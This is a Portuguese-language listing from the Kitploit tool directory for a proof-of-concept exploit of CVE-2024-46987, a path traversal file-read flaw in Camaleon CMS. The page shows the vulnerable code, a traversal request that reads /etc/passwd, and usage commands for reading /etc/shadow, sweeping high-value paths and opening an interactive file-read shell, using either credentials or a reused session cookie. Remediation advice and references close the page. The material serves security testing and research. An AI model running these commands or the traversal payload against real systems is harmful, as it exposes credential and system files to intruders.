Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-46987 — PoC exploit para CVE-2024-46987 — Camaleon CMS travessia arbitrária de caminho (leitura de arquivo) | Kitploit
Ferramentas/GitHubGitHub/blueberryp1ll/cve-2024-46987
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubblueberryp1ll/cve-2024-46987

CVE-2024-46987

PoC exploit para CVE-2024-46987 — Camaleon CMS travessia arbitrária de caminho (leitura de arquivo)

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-46987 — Camaleon CMS Path Traversal Arbitrário

Apenas para avaliações de segurança autorizadas, testes de penetração e pesquisa educacional.

Visão Geral

CampoDetalhe
CVECVE-2024-46987
ProdutoCamaleon CMS
Versões>= 2.8.0, < 2.8.2 (também confirmado na 2.9.0)
TipoPath Traversal / Leitura Arbitrária de Arquivos (CWE-22)
AutenticaçãoObrigatória (qualquer conta de baixo privilégio)
CVSS7.7 Alto — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Corrigido em2.8.2

Vulnerabilidade

MediaController#download_private_file passa params[:file] sem sanitização para fetch_file:

root@kitploit:~
# Vulnerable sink
fetch_file("private/#{params[:file]}")

Nenhuma normalização de caminho é aplicada antes que o valor seja usado com send_file, permitindo que um atacante autenticado saia do diretório private/ usando sequências ../ e leia arquivos arbitrários aos quais o processo Rails tenha permissão de acesso.

Endpoint vulnerável:

root@kitploit:~
GET /admin/media/download_private_file?file=../../../../../../etc/passwd

Requisitos

  • Python 3.8+
  • Biblioteca requests
root@kitploit:~
pip3 install requests

Uso

root@kitploit:~
usage: CVE-2024-46987.py [-h] -u URL (--cookie COOKIE | -U USERNAME)
                         [-P PASSWORD] [-f FILE] [-d DEPTH]
                         [--interesting] [--interactive]
                         [--no-verify] [--debug]

Autenticação baseada em credenciais

root@kitploit:~
# Read /etc/passwd (default)
python3 CVE-2024-46987.py -u http://target.com -U admin -P password

# Read a specific file
python3 CVE-2024-46987.py -u http://target.com -U admin -P password -f /etc/shadow

# Scan a list of high-value paths automatically
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interesting

# Interactive file-read shell
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interactive

Reutilizar uma sessão existente (do Burp Suite / DevTools do navegador)

root@kitploit:~
# Single file
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX" -f /etc/passwd

# Interactive shell
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX; auth_token=YYYY" --interactive

Opções

SinalizadorDescrição
-uURL base do alvo
-U / -PNome de usuário e senha do CMS
--cookieString de cookie bruta (alternativa às credenciais)
-fCaminho do arquivo a ser lido (padrão: /etc/passwd)
-dProfundidade do traversal — número de ../ adicionados (padrão: 10)
--interestingIterar sobre uma lista interna de caminhos de alto valor
--interactiveShell interativo de leitura de arquivos
--no-verifyDesabilitar verificação do certificado TLS
--debugSaída verbosa para diagnosticar falhas de autenticação

Notas sobre pseudo-arquivos /proc

Arquivos em /proc/self/ (por exemplo, environ, cmdline) retornam HTTP 200 mas com corpo vazio. Isso é esperado — o kernel reporta seu tamanho como 0, então o send_file do Rails não transmite nada. Use arquivos planos comuns como alternativa.

Remediação

Atualize o Camaleon CMS para a versão 2.8.2 ou posterior. A correção adiciona normalização adequada de caminhos e garante que o caminho resolvido permaneça dentro do diretório pretendido antes de chamar send_file.

Alternativamente:

  • Normalize todos os caminhos de arquivo fornecidos pelo utilizador antes do uso.
  • Rejeite qualquer entrada contendo sequências ...
  • Aplique o princípio do menor privilégio ao usuário do SO que executa o processo Rails.

Referências

  • GHSA-cp65-5m9r-vc2c — GitHub Advisory
  • GHSL-2024-183 — GitHub Security Lab
  • NVD — CVE-2024-46987

Aviso Legal

Esta prova de conceito é publicada para fins educacionais e para auxiliar profissionais de segurança a entender e reproduzir a vulnerabilidade em ambientes de teste autorizados. O autor não é responsável por qualquer uso indevido. Sempre obtenha permissão explícita por escrito antes de testar sistemas que você não possui.

Baixar ferramenta